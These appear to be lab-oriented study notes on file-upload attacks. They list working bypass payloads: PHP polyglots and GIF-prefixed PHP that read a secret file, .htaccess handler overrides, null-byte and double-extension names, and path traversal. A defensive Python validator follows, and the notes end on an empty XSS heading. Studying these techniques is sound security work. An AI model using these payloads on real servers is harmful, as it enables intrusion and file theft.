File Upload

  1. Upload with a file name that includes obfuscated path traversal, ..%2fexploit.php, and retrieve the content with GET /files/avatars/..%2fexploit.php.

  2. Upload a file named exploit.php%00.jpg (trailing null byte character) and get file execution at /files/avatars/exploit.php.

  3. Create a polyglot from a valid image file by running the following in a bash terminal: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php. Once the polyglot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php, and search the response content for the phrase START to locate the sensitive data.

  4. Upload two different files. First upload .htaccess with Content-Type: text/plain and the file data set to AddType application/x-httpd-php .l33t. This allows uploading and executing a second file named exploit.l33t, with the extension l33t.

  5. Only the MIME types image/jpeg or image/png are allowed. Bypass the filter by setting Content-Type to image/jpeg and then uploading the exploit.php file.

  6. If the target allows Remote File Include (RFI), i.e. upload from a remote URL, host an exploit file with the following GIF magic bytes: GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>. The file name on the exploit server could read image.php%00.gif.

  7. Double file extension to bypass the filter, such as exploit.csv.php.

File extension bypass:

  1. Extension with varied capitalization, such as .sVG

  2. Double extension, such as .jpg.svg or .svg.jpg

  3. Extension with a delimiter, such as %0a, %09, %0d, %00, #. Other examples: file.png%00.svg or file.png\x0d\x0a.svg

  4. Empty filename with only the extension, such as .svg

  5. Try to truncate the allowed extension by exceeding the maximum filename length.
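As a defender's counterpart to the bypasses in both lists above (an added example, not part of the original notes): a Python upload validator that rejects each of them. The allowed-extension policy, the length limit and the sample inputs are constructed assumptions for this example.

```python
import re
import uuid
from urllib.parse import unquote

# Constructed policy for this example: raster images only, short names.
ALLOWED = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg"}
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
MAX_NAME_LEN = 64


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return a server-chosen storage name or raise ValueError.

    The client name is only inspected so hostile names can be rejected
    and logged; it never reaches the filesystem.
    """
    # Decode twice so ..%2f and ..%252f both collapse to '../'.
    name = unquote(unquote(filename))
    # Null byte, CR/LF/TAB, '#' and path separators: reject outright.
    if re.search(r"[\x00-\x1f/\\#]", name):
        raise ValueError("control character or path separator in name")
    if len(name) > MAX_NAME_LEN:
        raise ValueError("filename too long")
    parts = name.split(".")
    # Dotfiles (.htaccess, bare '.svg') and multi-extension names
    # (exploit.csv.php, file.png.svg) are refused.
    if len(parts) != 2 or not parts[0]:
        raise ValueError("name must be base.ext with a non-empty base")
    ext = parts[1].lower()  # .sVG / .PhP normalise before the allowlist check
    if ext not in ALLOWED:
        raise ValueError(f"extension .{ext} not allowed")
    # Content-Type is attacker-controlled: it must agree with the extension,
    # and the body must carry that type's magic bytes.
    if content_type != ALLOWED[ext]:
        raise ValueError("content type does not match extension")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("magic bytes do not match extension")
    # A valid image header does not prove the body is harmless: an exiftool
    # polyglot keeps the PNG signature, so look for script markers too.
    if b"<?" in data or b"<script" in data.lower():
        raise ValueError("script marker inside image body")
    # Random server-side name; store it outside the web root and serve it
    # with a fixed Content-Type so no handler (PHP, .htaccess) ever runs it.
    return f"{uuid.uuid4().hex}.{ext}"


def is_accepted(filename: str, content_type: str, data: bytes) -> bool:
    """Boolean wrapper around validate_upload for quick policy checks."""
    try:
        validate_upload(filename, content_type, data)
    except ValueError:
        return False
    return True
```

Re-encoding accepted images with an image library before storage removes metadata-borne payloads that the marker check alone might miss.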

XSS via SVG upload
